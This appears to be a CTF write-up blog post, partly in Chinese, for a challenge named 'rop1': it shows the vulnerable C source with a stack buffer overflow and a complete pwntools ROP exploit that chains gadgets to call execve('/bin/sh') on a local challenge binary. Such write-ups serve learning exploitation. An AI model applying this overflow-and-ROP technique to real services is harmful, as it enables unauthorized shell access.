Featured image of post lys rop1 Writes up

lys rop1 Writes up

lys rop1 Writes up

Recon

file: image

checksec: image

source.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

char name[0x100];

size_t readbuf(char *buf, size_t len)
{
    size_t i=0;
    while(i<len){
        if(read(0,&buf[i],1)!=1){
            break;
        }
        if(buf[i]=='\n'){
            buf[i] = 0;
            break;
        }
        i++;
    }
    return i;
}

int main()
{
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);
    //printf("Gift: ")
    printf("What is your name? ");
    readbuf(name, 0x100);
    printf("Hello, %s\n", name);
    char buf[0x10];
    printf("You have a buffer overflow vuln: ");
    readbuf(buf, 0x100);
    return 0;
}

我們發現在 "You have a buffer overflow vuln: "的 buf 大小是 10 ,但是他用 readbuf(buf,0x100) 去讀,所以導致了 buffer overflow 的問題,再來,題目本身是 statically linked , 所以我們可以很方便的去找 gadget 來用 owob

exploit

我們的目的是要執行 execve 這個 systemcall ,所以我們要達成下面的條件

暫存器
rax0x3b
rdi‘/bin/sh’的位置
rsi0
rdx0

經過一番尋找之後,我們成功湊齊了所有必要的 gadget ,但是有一個問題是 pop rdx 的gadget 不是那麼乾淨,那我們可以用 pop rdx ; pop rbx 去解決它 , 最後一個問題是,我們該如何找到 name 也就是我們執行 ‘/bin/sh’ 應該要有的位置, 其實只要用 ida 點下去那一個 function 就找到了 owob

image

暫存器
rax0x44fd87
rdi0x401f4f+name_addr
rsi0x409f7e
rdx_rbx0x485bab
syscall0x401d04

exp.py:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context(arch="amd64")

r=process('./rop1')


p=''

name=p64(0x4C7300)
pop_rax=p64(0x000000000044fd87)+p64(0x3b)
pop_rdi=p64(0x0000000000401f4f)+name
pop_rsi=p64(0x0000000000409f7e)+p64(0x0)
pop_rdx_pop_rbx=p64(0x0000000000485bab)+p64(0x0)+p64(0x0)
syscall=p64(0x0000000000401d04)

p+=pop_rax+pop_rdi+pop_rsi+pop_rdx_pop_rbx+syscall

r.sendlineafter('?','/bin/sh')

r.sendlineafter(':','a'*0x18+p)

r.interactive()

pwned!

image

Licensed under CC BY-NC-SA 4.0
comments powered by Disqus
Built with Hugo
Theme Stack designed by Jimmy